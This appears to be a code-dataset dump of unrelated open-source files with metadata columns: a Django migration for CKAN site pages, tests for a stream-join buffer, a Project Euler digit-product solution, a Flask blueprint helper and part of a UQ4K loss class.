| 34.867769 | 88 | 0.813226 | 463 | 4,219 | 7.185745 | 0.207343 | 0.251277 | 0.300571 | 0.4208 | 0.832281 | 0.805831 | 0.805831 | 0.709348 | 0.303276 | 0.087767 | 0 | 0.004391 | 0.136288 | 4,219 | 120 | 89 | 35.158333 | 0.908617 | 0.123015 | 0 | 0.133333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008333 | 0 | 1 | 0.05 | true | 0 | 0.733333 | 0 | 0.783333 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 11 |
cdc0b01dda5906444aca85708d437f40024752ad | 6,517 | py | Python | streams/ckan_pages/migrations/0003_auto_20200928_0605.py | Engerrs/ckan.org | a5a9b63b0ca16cb5aa4f709f7a264b8f6c265158 | [
"BSD-3-Clause"
] | 1 | 2022-03-18T03:20:00.000Z | 2022-03-18T03:20:00.000Z | streams/ckan_pages/migrations/0003_auto_20200928_0605.py | Engerrs/ckan.org | a5a9b63b0ca16cb5aa4f709f7a264b8f6c265158 | [
"BSD-3-Clause"
] | 26 | 2021-07-07T08:42:42.000Z | 2022-03-29T14:34:59.000Z | streams/ckan_pages/migrations/0003_auto_20200928_0605.py | Engerrs/ckan.org | a5a9b63b0ca16cb5aa4f709f7a264b8f6c265158 | [
"BSD-3-Clause"
] | 3 | 2021-07-07T22:11:03.000Z | 2021-09-15T18:19:10.000Z | # Generated by Django 3.1.1 on 2020-09-28 06:05
from django.db import migrations, models
import django.db.models.deletion
import modelcluster.fields
class Migration(migrations.Migration):
    dependencies = [
        ('ckan_pages', '0002_auto_20200928_0605'),
        ('wagtailimages', '0022_uploadedimage'),
        ('streams', '0002_auto_20200928_0605'),
    ]

    operations = [
        migrations.AddField(
            model_name='workinggroups',
            name='working_group',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='streams.workinggroup'),
        ),
        migrations.AddField(
            model_name='stewards',
            name='page',
            field=modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='stewards', to='ckan_pages.communitypage'),
        ),
        migrations.AddField(
            model_name='stewards',
            name='steward',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='streams.steward'),
        ),
        migrations.AddField(
            model_name='softwareengineers',
            name='developer',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='streams.softwareengineer'),
        ),
        migrations.AddField(
            model_name='softwareengineers',
            name='page',
            field=modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='developers', to='ckan_pages.communitypage'),
        ),
        migrations.AddField(
            model_name='showcasesection3',
            name='page',
            field=modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='showcase_section_3', to='ckan_pages.showcasepage'),
        ),
        migrations.AddField(
            model_name='showcasesection3',
            name='showcase',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='streams.poweredcard'),
        ),
        migrations.AddField(
            model_name='showcasesection2',
            name='page',
            field=modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='showcase_section_2', to='ckan_pages.showcasepage'),
        ),
        migrations.AddField(
            model_name='showcasesection2',
            name='showcase',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='streams.poweredcard'),
        ),
        migrations.AddField(
            model_name='showcasesection1',
            name='page',
            field=modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='showcase_section_1', to='ckan_pages.showcasepage'),
        ),
        migrations.AddField(
            model_name='showcasesection1',
            name='showcase',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='streams.poweredcard'),
        ),
        migrations.AddField(
            model_name='generalfeatures',
            name='feature',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='streams.generalfeature'),
        ),
        migrations.AddField(
            model_name='generalfeatures',
            name='page',
            field=modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='general_features', to='ckan_pages.featurespage'),
        ),
        migrations.AddField(
            model_name='feedbacksection2',
            name='feedback',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='streams.feedback'),
        ),
        migrations.AddField(
            model_name='feedbacksection2',
            name='page',
            field=modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='feedback_section_2', to='ckan_pages.showcasepage'),
        ),
        migrations.AddField(
            model_name='feedbacksection1',
            name='feedback',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='streams.feedback'),
        ),
        migrations.AddField(
            model_name='feedbacksection1',
            name='page',
            field=modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='feedback_section_1', to='ckan_pages.showcasepage'),
        ),
        migrations.AddField(
            model_name='features',
            name='feature',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='streams.feature'),
        ),
        migrations.AddField(
            model_name='features',
            name='page',
            field=modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='features', to='ckan_pages.featurespage'),
        ),
        migrations.AddField(
            model_name='extensions',
            name='extension',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='streams.extension'),
        ),
        migrations.AddField(
            model_name='extensions',
            name='page',
            field=modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='extensions', to='ckan_pages.featurespage'),
        ),
        migrations.AddField(
            model_name='communitypage',
            name='contributors_image',
            field=models.ForeignKey(help_text="Contributors' photos", null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.image'),
        ),
        migrations.AddField(
            model_name='communitypage',
            name='open_knowledge_foundation_image',
            field=models.ForeignKey(help_text='Open Knowledge Foundation block image', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.image'),
        ),
        migrations.AddField(
            model_name='ckanforfeatures',
            name='ckan_for_card',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='streams.ckanforcard'),
        ),
        migrations.AddField(
            model_name='ckanforfeatures',
            name='page',
            field=modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='ckan_for_cards', to='ckan_pages.featurespage'),
        ),
| 45.573427 | 188 | 0.639558 | 642 | 6,517 | 6.327103 | 0.141745 | 0.053176 | 0.089611 | 0.140817 | 0.855736 | 0.855736 | 0.704825 | 0.704825 | 0.655096 | 0.626539 | 0 | 0.013288 | 0.23784 | 6,517 | 142 | 189 | 45.894366 | 0.80451 | 0.006905 | 0 | 0.713235 | 1 | 0 | 0.211128 | 0.058423 | 0.014706 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.022059 | 0 | 0.044118 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
cdef5d8dcc7fc8e0f97dd96c748ea6b02b5ff4d0 | 18,160 | py | Python | server/TimeSeriesJoiner/LocalStreamBuffer/tester.py | iot-salzburg/panta-rhei | 3249fdbb199df59bf400f0f6d0497438afcec443 | [
"Apache-2.0"
] | 6 | 2019-07-15T22:41:58.000Z | 2020-10-04T11:34:35.000Z | server/TimeSeriesJoiner/LocalStreamBuffer/tester.py | iot-salzburg/panta-rhei | 3249fdbb199df59bf400f0f6d0497438afcec443 | [
"Apache-2.0"
] | null | null | null | server/TimeSeriesJoiner/LocalStreamBuffer/tester.py | iot-salzburg/panta-rhei | 3249fdbb199df59bf400f0f6d0497438afcec443 | [
"Apache-2.0"
] | 3 | 2019-01-11T11:02:00.000Z | 2021-09-30T12:58:50.000Z | #!/usr/bin/env python3
# Tester for the join-algorithm in local_stream_buffer.
import sys
import time
import random
try:
from .local_stream_buffer import Record, StreamBuffer
except ImportError:
from local_stream_buffer import Record, StreamBuffer
def join_fct(record_left, record_right):
"""
Blueprint for the join function, takes two records and merges them using the defined routine.
:param record_left: Record
Record that is joined as left join partner
:param record_right: Record
Record that is joined as right join partner
:return: Record
the resulting record from the join of both partners
"""
record = Record(quantity="t",
result=record_left.get_result() * record_right.get_result(),
timestamp=(record_left.get_time() + record_right.get_time()) / 2)
# here, the resulting record can be produced to e.g. Apache Kafka or a pipeline
return record
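For orientation, here is a self-contained sketch of what `join_fct` produces, using a minimal stand-in for `Record` (only the `get_result`/`get_time` accessors the blueprint relies on are reproduced; the real class lives in `local_stream_buffer`):

```python
# Minimal stand-in for Record, exposing only the accessors join_fct uses.
class Record:
    def __init__(self, quantity, result, timestamp):
        self.quantity = quantity
        self.result = result
        self.timestamp = timestamp

    def get_result(self):
        return self.result

    def get_time(self):
        return self.timestamp


def join_fct(record_left, record_right):
    # Same routine as the blueprint above: multiply results, average timestamps.
    return Record(quantity="t",
                  result=record_left.get_result() * record_right.get_result(),
                  timestamp=(record_left.get_time() + record_right.get_time()) / 2)


r = Record(quantity="r", result=2.0, timestamp=1600000000.0)
s = Record(quantity="s", result=3.0, timestamp=1600000002.0)
t = join_fct(r, s)
print(t.quantity, t.result, t.timestamp)  # t 6.0 1600000001.0
```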
def test_one_one():
ts = time.time()
# create an instance of the StreamBuffer class
stream_buffer = StreamBuffer(instant_emit=True, delta_time=sys.maxsize, left="r", buffer_results=True,
verbose=True)
# create Queues to store the input streams
events_r = list()
events_s = list()
# Fill the input_stream with randomized Records
N = 100
random.seed(0)
event_order = ["r", "s"] * int(N / 2)
start_time = 1600000000
for i in range(len(event_order)):
if event_order[i] == "r":
events_r.append(Record(timestamp=i + start_time, quantity=event_order[i], result=random.random()))
elif event_order[i] == "s":
events_s.append(Record(timestamp=i + start_time, quantity=event_order[i], result=random.random()))
ingestion_order = ["r", "s"] * int(N/2) # works
n_r = n_s = 0
for i in range(N):
# decide based on the ingestion order which stream record is forwarded
# store as dict of KafkaRecords and a flag whether it was already joined as older sibling
if ingestion_order[i] == "r":
# receive the first record from the event stream
stream_buffer.ingest_left(events_r[n_r]) # instant emit
n_r += 1
elif ingestion_order[i] == "s":
# receive the first record from the event stream
stream_buffer.ingest_right(events_s[n_s])
n_s += 1
# print("\nRecords in buffer r:")
# for rec in stream_buffer.buffer_left:
# print(rec)
# print("Records in buffer s:")
# for rec in stream_buffer.buffer_right:
# print(rec)
# print("Merged records in buffer t:")
events_t = stream_buffer.fetch_results()
# for rec in events_t:
# print(rec)
print(f"Join time-series with |r| = {n_r}, |s| = {n_s}.")
print(f"joined {len(events_t)} tuples in {time.time() - ts} s.")
assert len(events_t) == 99
def test_five_five():
# create an instance of the StreamBuffer class
stream_buffer = StreamBuffer(instant_emit=True, delta_time=sys.maxsize, left="r", buffer_results=True,
verbose=True)
# Test Settings:
# Create Queues to store the input streams
events_r = list()
events_s = list()
# Fill the input_stream with randomized
N = 20
random.seed(0)
event_order = (["r"] * 5 + ["s"] * 5) * int(N / 10)
start_time = 1600000000
for i in range(len(event_order)):
if event_order[i] == "r":
events_r.append(Record(timestamp=i + start_time, quantity=event_order[i], result=random.random()))
elif event_order[i] == "s":
events_s.append(Record(timestamp=i + start_time, quantity=event_order[i], result=random.random()))
ingestion_order = (["r"] * 5 + ["s"] * 5) * N
n_r = n_s = 0
ts = time.time()
for i in range(N):
# decide based on the ingestion order which stream record is forwarded
# store as dict of KafkaRecords and a flag whether it was already joined as older sibling
if ingestion_order[i] == "r":
# receive the first record from the event stream
stream_buffer.ingest_left(events_r[n_r]) # instant emit
n_r += 1
elif ingestion_order[i] == "s":
# receive the first record from the event stream
stream_buffer.ingest_right(events_s[n_s])
n_s += 1
events_t = stream_buffer.fetch_results()
print(f"Join time-series with |r| = {n_r}, |s| = {n_s}.")
print(f"joined {len(events_t)} tuples in {time.time() - ts} s.")
assert len(events_t) == 23
def test_five_five_many():
# create an instance of the StreamBuffer class
stream_buffer = StreamBuffer(instant_emit=True, delta_time=sys.maxsize, left="r", buffer_results=True,
verbose=False)
# Test Settings:
# Create Queues to store the input streams
events_r = list()
events_s = list()
# Fill the input_stream with randomized
N = 100_000
random.seed(0)
event_order = (["r"] * 5 + ["s"] * 5) * int(N / 10)
start_time = 1600000000
for i in range(len(event_order)):
if event_order[i] == "r":
events_r.append(Record(timestamp=i + start_time, quantity=event_order[i], result=random.random()))
elif event_order[i] == "s":
events_s.append(Record(timestamp=i + start_time, quantity=event_order[i], result=random.random()))
ingestion_order = (["r"] * 5 + ["s"] * 5) * int(N/10)
n_r = 0
n_s = 0
ts = time.time()
for i in range(N):
# decide based on the ingestion order which stream record is forwarded
# store as dict of KafkaRecords and a flag whether it was already joined as older sibling
if ingestion_order[i] == "r":
# receive the first record from the event stream
stream_buffer.ingest_left(events_r[n_r]) # instant emit
n_r += 1
elif ingestion_order[i] == "s":
# receive the first record from the event stream
stream_buffer.ingest_right(events_s[n_s])
n_s += 1
events_t = stream_buffer.fetch_results()
stop_time = time.time()
print(f"Join time-series with |r| = {n_r}, |s| = {n_s}.")
    print(f"joined {len(events_t)} tuples in {stop_time - ts} s.")
    print(f"that are {int(len(events_t) / (stop_time - ts))} joins per second.")
assert len(events_t) == 179987
assert stop_time - ts < 12
def test_unordered():
# create an instance of the StreamBuffer class
stream_buffer = StreamBuffer(instant_emit=True, delta_time=sys.maxsize, left="r", buffer_results=True,
verbose=True)
# Fill the input_stream with randomized
random.seed(0)
start_time = 1600000000
# Test Settings:
# Create Queues to store the input records
events_r = list()
for i in range(10):
events_r.append(Record(timestamp=i + start_time, quantity="r", result=random.random()))
ts = time.time()
# first ingest all Records into R, then all into s
for event in events_r:
stream_buffer.ingest_left(event) # instant emit
print("Ingest Records into s.")
stream_buffer.ingest_right(Record(timestamp=start_time - 0.5, quantity="s", result=random.random()))
stream_buffer.ingest_right(Record(timestamp=start_time + 0.5, quantity="s", result=random.random()))
stream_buffer.ingest_right(Record(timestamp=start_time + 5.5, quantity="s", result=random.random()))
stream_buffer.ingest_right(Record(timestamp=start_time + 9.5, quantity="s", result=random.random()))
events_t = stream_buffer.fetch_results()
print(f"Join time-series with |r| = {len(events_r)}, |s| = {4}.")
print(f"joined {len(events_t)} tuples in {time.time() - ts} s.")
if time.time() - ts > 1e-3:
print(f"that are {int(len(events_t)/(time.time() - ts))} joins per second.")
assert len(events_t) == 20
d = {'r.quantity': 'r', 'r.phenomenonTime': 1600000006, 'r.result': 0.7837985890347726,
's.quantity': 's', 's.phenomenonTime': 1600000005.5, 's.result': 0.28183784439970383}
assert d in events_t
def test_randomized():
# create an instance of the StreamBuffer class
stream_buffer = StreamBuffer(instant_emit=True, delta_time=sys.maxsize, left="r", buffer_results=True,
verbose=True)
# Test Settings:
# Create Queues to store the input streams
events_r = list()
events_s = list()
# Fill the input_stream with randomized
n_r = n_s = 10
random.seed(0)
start_time = 1600000000
phenomenon_time = start_time
for i in range(n_r):
phenomenon_time += random.random()
events_r.append(Record(timestamp=phenomenon_time, quantity="r", result=random.random()))
phenomenon_time = start_time
for i in range(n_s):
phenomenon_time += random.random()
events_s.append(Record(timestamp=phenomenon_time, quantity="s", result=random.random()))
ingestion_order = ["r"] * n_r + ["s"] * n_s
random.shuffle(ingestion_order)
n_r = n_s = 0
ts = time.time()
for quantity in ingestion_order:
# decide based on the ingestion order which stream record is forwarded
# store as dict of KafkaRecords and a flag whether it was already joined as older sibling
if quantity == "r":
# receive the first record from the event stream
stream_buffer.ingest_left(events_r[n_r]) # instant emit
n_r += 1
elif quantity == "s":
# receive the first record from the event stream
stream_buffer.ingest_right(events_s[n_s])
n_s += 1
events_t = stream_buffer.fetch_results()
print(f"Join time-series with |r| = {n_r}, |s| = {n_s}.")
print(f"joined {len(events_t)} tuples in {time.time() - ts} s.")
assert len(events_t) == 20
def test_randomized_many():
# create an instance of the StreamBuffer class
stream_buffer = StreamBuffer(instant_emit=True, delta_time=sys.maxsize, left="r", buffer_results=True,
verbose=False)
# Test Settings:
# Create Queues to store the input streams
events_r = list()
events_s = list()
# Fill the input_stream with randomized
n_r = n_s = 10_000
random.seed(0)
start_time = 1600000000
phenomenon_time = start_time
for i in range(n_r):
phenomenon_time += random.random()
events_r.append(Record(timestamp=phenomenon_time, quantity="r", result=random.random()))
phenomenon_time = start_time
for i in range(n_s):
phenomenon_time += random.random()
events_s.append(Record(timestamp=phenomenon_time, quantity="s", result=random.random()))
ingestion_order = ["r"] * n_r + ["s"] * n_s
random.shuffle(ingestion_order)
n_r = n_s = 0
ts = time.time()
for quantity in ingestion_order:
# decide based on the ingestion order which stream record is forwarded
# store as dict of KafkaRecords and a flag whether it was already joined as older sibling
if quantity == "r":
# receive the first record from the event stream
stream_buffer.ingest_left(events_r[n_r]) # instant emit
n_r += 1
elif quantity == "s":
# receive the first record from the event stream
stream_buffer.ingest_right(events_s[n_s])
n_s += 1
events_t = stream_buffer.fetch_results()
stop_time = time.time()
print(f"Join time-series with |r| = {n_r}, |s| = {n_s}.")
    print(f"joined {len(events_t)} tuples in {stop_time - ts} s.")
    print(f"that are {int(len(events_t) / (stop_time - ts))} joins per second.")
assert len(events_t) == 23041
assert stop_time - ts < 2 # we got around 0.4 s
def test_delayed_many():
imbalance = 100 # additional latency of stream s
# create an instance of the StreamBuffer class
stream_buffer = StreamBuffer(instant_emit=True, delta_time=sys.maxsize, left="r", buffer_results=True,
verbose=False)
# Test Settings:
# Create Queues to store the input streams
events_r = list()
events_s = list()
# Fill the input_stream with randomized
N = 10_000
random.seed(0)
event_order = (["r"] * 5 + ["s"] * 5) * int(N/10)
start_time = 1600000000
for i in range(len(event_order)):
if event_order[i] == "r":
events_r.append(Record(timestamp=i + start_time, quantity=event_order[i], result=random.random()))
elif event_order[i] == "s":
events_s.append(Record(timestamp=i + start_time, quantity=event_order[i], result=random.random()))
ingestion_order = ["r"] * imbalance + (["r"] * 5 + ["s"] * 5) * int(N/10)
n_r = 0
n_s = 0
ts = time.time()
while n_r < len(events_r) and n_s < len(events_s):
# decide based on the ingestion order which stream record is forwarded
# store as dict of KafkaRecords and a flag whether it was already joined as older sibling
if ingestion_order[n_r+n_s] == "r":
# receive the first record from the event stream
stream_buffer.ingest_left(events_r[n_r]) # instant emit
n_r += 1
elif ingestion_order[n_r+n_s] == "s":
# receive the first record from the event stream
stream_buffer.ingest_right(events_s[n_s])
n_s += 1
events_t = stream_buffer.fetch_results()
    stop_time = time.time()
    print(f"Join time-series with |r| = {n_r}, |s| = {n_s}.")
    print(f"joined {len(events_t)} tuples in {stop_time - ts} s.")
    print(f"that are {int(len(events_t) / (stop_time - ts))} joins per second.")
    assert len(events_t) == 13702
    assert stop_time - ts < 1  # we got around 0.2 s
def test_timeout_five_five():
# create an instance of the StreamBuffer class
stream_buffer = StreamBuffer(instant_emit=True, delta_time=3, left="r", buffer_results=True,
verbose=True)
# Test Settings:
# Create Queues to store the input streams
events_r = list()
events_s = list()
# Fill the input_stream with randomized
N = 20
random.seed(0)
event_order = (["r"] * 5 + ["s"] * 5) * int(N / 10)
start_time = 1600000000
for i in range(len(event_order)):
if event_order[i] == "r":
events_r.append(Record(timestamp=i + start_time, quantity=event_order[i], result=random.random()))
elif event_order[i] == "s":
events_s.append(Record(timestamp=i + start_time, quantity=event_order[i], result=random.random()))
ingestion_order = (["r"] * 5 + ["s"] * 5) * N
n_r = n_s = 0
ts = time.time()
for i in range(N):
# decide based on the ingestion order which stream record is forwarded
# store as dict of KafkaRecords and a flag whether it was already joined as older sibling
if ingestion_order[i] == "r":
# receive the first record from the event stream
stream_buffer.ingest_left(events_r[n_r]) # instant emit
n_r += 1
elif ingestion_order[i] == "s":
# receive the first record from the event stream
stream_buffer.ingest_right(events_s[n_s])
n_s += 1
events_t = stream_buffer.fetch_results()
print(f"Join time-series with |r| = {n_r}, |s| = {n_s}.")
print(f"joined {len(events_t)} tuples in {time.time() - ts} s.")
assert len(events_t) == 13
def test_timeout_randomized():
# create an instance of the StreamBuffer class with a delta_time of 0.5 seconds.
stream_buffer = StreamBuffer(instant_emit=True, delta_time=0.5, left="r", buffer_results=True,
verbose=True)
# Test Settings:
# Create Queues to store the input streams
events_r = list()
events_s = list()
# Fill the input_stream with randomized
n_r = n_s = 10
random.seed(0)
start_time = 1600000000
phenomenon_time = start_time
for i in range(n_r):
phenomenon_time += random.random()
events_r.append(Record(timestamp=phenomenon_time, quantity="r", result=random.random()))
phenomenon_time = start_time
for i in range(n_s):
phenomenon_time += random.random()
events_s.append(Record(timestamp=phenomenon_time, quantity="s", result=random.random()))
ingestion_order = ["r"] * n_r + ["s"] * n_s
random.shuffle(ingestion_order)
n_r = n_s = 0
ts = time.time()
for quantity in ingestion_order:
# decide based on the ingestion order which stream record is forwarded
# store as dict of KafkaRecords and a flag whether it was already joined as older sibling
if quantity == "r":
# receive the first record from the event stream
stream_buffer.ingest_left(events_r[n_r]) # instant emit
n_r += 1
elif quantity == "s":
# receive the first record from the event stream
stream_buffer.ingest_right(events_s[n_s])
n_s += 1
events_t = stream_buffer.fetch_results()
print(f"Join time-series with |r| = {n_r}, |s| = {n_s}.")
print(f"joined {len(events_t)} tuples in {time.time() - ts} s.")
assert len(events_t) == 16
# to profile via cProfile, run it normally with a python interpreter
if __name__ == "__main__":
import cProfile
pr = cProfile.Profile()
pr.enable()
# test ordered ingestion
test_one_one()
test_five_five()
print("\n #############################\n")
print("Testing unordered ingestion:")
test_unordered()
test_randomized()
# test unordered ingestion
print("\n #############################\n")
print("Performance tests")
test_five_five_many()
test_randomized_many()
test_delayed_many()
print("\n #############################\n")
print("Timeout tests")
test_timeout_five_five()
test_timeout_randomized()
pr.disable()
# after your program ends
pr.print_stats(sort="tottime")
# Back in outer section of code
# pr.dump_stats('tester_profile.pstat')
| 37.520661 | 110 | 0.62957 | 2,585 | 18,160 | 4.244874 | 0.082012 | 0.048118 | 0.007382 | 0.016039 | 0.835961 | 0.834685 | 0.808621 | 0.800419 | 0.787205 | 0.783013 | 0 | 0.021922 | 0.253965 | 18,160 | 483 | 111 | 37.598344 | 0.788013 | 0.244989 | 0 | 0.745033 | 0 | 0.003311 | 0.112134 | 0.015988 | 0 | 0 | 0 | 0 | 0.043046 | 1 | 0.033113 | false | 0 | 0.023179 | 0 | 0.059603 | 0.099338 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
b56a95803496f05bea0423e4dd78cdd3b91796d8 | 1,745 | py | Python | 08/8.py | cjm00/project-euler | 10f186aafda2ed13bf93cf3e3ba6cff63c85fbd0 | [
"CC-BY-3.0"
] | 1 | 2015-08-16T20:30:40.000Z | 2015-08-16T20:30:40.000Z | 08/8.py | cjm00/project-euler | 10f186aafda2ed13bf93cf3e3ba6cff63c85fbd0 | [
"CC-BY-3.0"
] | 1 | 2016-08-11T13:06:12.000Z | 2016-08-11T13:06:12.000Z | 08/8.py | cjm00/project-euler | 10f186aafda2ed13bf93cf3e3ba6cff63c85fbd0 | [
"CC-BY-3.0"
] | null | null | null | window = 13 #Problem asks for 13 adjacent digits
#whitespace kept to preserve readability
problem_string = """73167176531330624919225119674426574742355349194934
96983520312774506326239578318016984801869478851843
85861560789112949495459501737958331952853208805511
12540698747158523863050715693290963295227443043557
66896648950445244523161731856403098711121722383113
62229893423380308135336276614282806444486645238749
30358907296290491560440772390713810515859307960866
70172427121883998797908792274921901699720888093776
65727333001053367881220235421809751254540594752243
52584907711670556013604839586446706324415722155397
53697817977846174064955149290862569321978468622482
83972241375657056057490261407972968652414535100474
82166370484403199890008895243450658541227588666881
16427171479924442928230863465674813919123162824586
17866458359124566529476545682848912883142607690042
24219022671055626321111109370544217506941658960408
07198403850962455444362981230987879927244284909188
84580156166097919133875499200524063689912560717606
05886116467109405077541002256983155200055935729725
71636269561882670428252483600823257530420752963450"""
#strip newlines
problem_string = problem_string.replace('\n', '')
def StringProduct(digits): #Takes the product of the individual digits in the input string
    total = 1
    for digit in digits:
        total *= int(digit)
    return total
output = 0
window_product = 0
index = 0
for k in range(len(problem_string) - window + 1): #+1 so the final window is included
window_product = StringProduct(problem_string[k:k+window])
if output < window_product:
output = window_product
index = k
print("The string with the greatest product is " + problem_string[index:index+window] + ", at position " + str(index))
print("The product is " + str(output))
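The same sliding-window search can be written more compactly. A hedged sketch on a short demo string (the helper and demo digits below are illustrative, not part of the original solution; the real run would use `problem_string` with `window = 13`):

```python
from functools import reduce
from operator import mul

def window_products(digits, window):
    # Product of each run of `window` adjacent digits, including the final run.
    return [reduce(mul, (int(c) for c in digits[k:k + window]), 1)
            for k in range(len(digits) - window + 1)]

demo = "3675356291"
products = window_products(demo, 4)
print(max(products))  # 630 (from the window "3675")
```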
| 37.12766 | 117 | 0.876791 | 126 | 1,745 | 12.063492 | 0.507937 | 0.051316 | 0.007895 | 0.014474 | 0.018421 | 0 | 0 | 0 | 0 | 0 | 0 | 0.627646 | 0.079656 | 1,745 | 46 | 118 | 37.934783 | 0.318804 | 0.08596 | 0 | 0 | 0 | 0 | 0.685104 | 0.628536 | 0 | 1 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.054054 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
b57f5f198ffbb8d88c16ba9b6c566b3a8bb98f0e | 205 | py | Python | app/blueprints/__init__.py | sarahmk125/flask-model | 4347b2d7fd065c10c150acc7376f21d2cbce6dbc | [
"Apache-2.0"
] | null | null | null | app/blueprints/__init__.py | sarahmk125/flask-model | 4347b2d7fd065c10c150acc7376f21d2cbce6dbc | [
"Apache-2.0"
] | null | null | null | app/blueprints/__init__.py | sarahmk125/flask-model | 4347b2d7fd065c10c150acc7376f21d2cbce6dbc | [
"Apache-2.0"
] | null | null | null | from app.blueprints import home
from app.blueprints import model
from app.blueprints import auth
def init_app(app, blueprints):
for blueprint in blueprints:
app.register_blueprint(blueprint)
| 22.777778 | 41 | 0.780488 | 28 | 205 | 5.642857 | 0.464286 | 0.329114 | 0.322785 | 0.436709 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.165854 | 205 | 8 | 42 | 25.625 | 0.923977 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.5 | 0 | 0.666667 | 1 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 8 |
a9348c6facb7d21dbbec1ee7d15dc38fd78f9d94 | 8,099 | py | Python | uq4k/models/loss.py | JPLMLIA/UQ4K | 7884200992b9bf5b4d8782e243eb4ff2470cea3f | [
"MIT"
] | 1 | 2022-03-18T14:40:23.000Z | 2022-03-18T14:40:23.000Z | uq4k/models/loss.py | JPLMLIA/UQ4K | 7884200992b9bf5b4d8782e243eb4ff2470cea3f | [
"MIT"
] | null | null | null | uq4k/models/loss.py | JPLMLIA/UQ4K | 7884200992b9bf5b4d8782e243eb4ff2470cea3f | [
"MIT"
] | null | null | null | # Implements objective function class for UQ4K. Provides a general objective
# function framework, which can take an arbitrary forward model.
#
# Author : Mike Stanley
# Written : August 26, 2021
# Last Mod : November 20, 2021
from abc import ABC, abstractmethod
import jax.numpy as jnp
import numpy as np
class AbstractLoss(ABC): # TODO: should these abstract methods be defined here?
def __init__(self):
super().__init__()
@abstractmethod
def sum_sq_norms(self):
"""
Finds the squared 2-norm of the difference between model and data
"""
pass
@abstractmethod
def center_dist(self):
"""
Finds the squared 2-norm between a new proposed parameter value and
the current center
"""
pass
class MeritFunc(AbstractLoss):
def __init__(self, forward_model, mu, data, qoi_func):
"""
Dimension key:
n : number of data points
d : dimension of each data point
m : dimension of the qoi
Parameters:
-----------
forward_model (BaseModel) : see base_model.py
mu (float) : merit function parameter
data (np arr) : array of observed data - n x d
qoi_func (function) : maps theta |-> qoi, R^n -> R^m
"""
self.forward_model = forward_model
self.mu = mu
self.data = data
self.qoi_func = qoi_func
def sum_sq_norms(self, params):
"""
Finds the squared 2-norm of the difference between model and data
Dimension key:
p : dimension of model parameters
Parameters:
-----------
params (np arr) : p
Returns:
--------
        squared 2-norm of residuals
"""
diffs = self.data - self.forward_model(params)
return np.square(diffs).sum()
def center_dist(self, new_point, center):
"""
Finds the squared 2-norm between a new proposed parameter value and
the current center
Dimension key:
p : dimension of model parameters
Parameters:
-----------
new_point (np arr) : p
center (np arr) : m
Returns:
--------
squared 2-norm of distance between two points
"""
return np.linalg.norm(self.qoi_func(new_point) - center) ** 2
def __call__(self, new_point, center, M_alpha):
"""
Evaluates the objective function at some new point.
Dimension key:
p : dimension of model parameters
m : dimension of the QoI
Parameters:
-----------
new_point (np arr) : p
center (np arr) : m
M_alpha (float) : bound on the error
Returns:
--------
Objective function
"""
# find the distance from center
